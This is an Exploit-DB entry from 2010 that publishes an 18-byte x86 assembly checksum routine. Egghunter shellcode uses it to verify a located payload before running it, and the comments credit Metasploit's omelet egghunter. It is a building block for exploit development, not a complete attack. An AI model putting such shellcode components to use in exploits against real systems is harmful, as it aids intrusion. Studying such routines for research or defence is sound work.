Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)

EDB-ID:

14873

CVE:

N/A




Platform:

Windows_x86

Date:

2010-09-01


;Exploit Title: Shellcode Checksum Routine
;Date: Sept 1 2010
;Author: dijital1
;Software Link:  http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm
;Tested on: Omelet Hunter Shellcode in MSF
;"|------------------------------------------------------------------|"
;"|                         __               __                      |"
;"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
;"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
;"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
;"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
;"|                                                                  |"
;"|                                       http://www.corelan.be:8800 |"
;"|                                              security@corelan.be |"
;"|                                                                  |"
;"|-------------------------------------------------[ EIP Hunters ]--|"
;"               -= Egg Hunter Checksum Routine     - dijital1 =-     "

[BITS 32]

;Author: Ron Henry - dijital1
;Email: rlh@ciphermonk.net
;Site: http://www.ciphermonk.net
;Greetz to Exploit-db and Team Corelan

;Ok... couple of assumptions with this code. First, we're using a single
;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a 
;collision.
;We consider this a worthwhile risk given the overall size of the code; 18 bytes.

;There are a couple ways to implement this, but a good example is how it
;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently
;added to the Metasploit Framework.

;We're using a 1 byte footer at the end of the shellcode that contains the
;checksum generated at shellcode creation.

; Variables eax: accumulator
;           edx: points to current byte in shellcode
;           ecx: counter

egg_size equ 0x7a       ;we're testing 122 bytes in this instance

find_egg:

xor ecx, ecx            ;zero the counter
xor eax, eax            ;zero the accumlator

calc_chksum_loop:
add al, byte [edx+ecx]  ;add the byte to running total
inc ecx                 ;increment the counter
cmp cl, egg_size        ;cmp counter to egg_size
jnz calc_chksum_loop    ;if it's not equal repeat

test_ckksum:
cmp al, byte [edx+ecx]  ;cmp eax with 1 byte checksum
jnz find_egg            ;search for another egg if checksum is bogus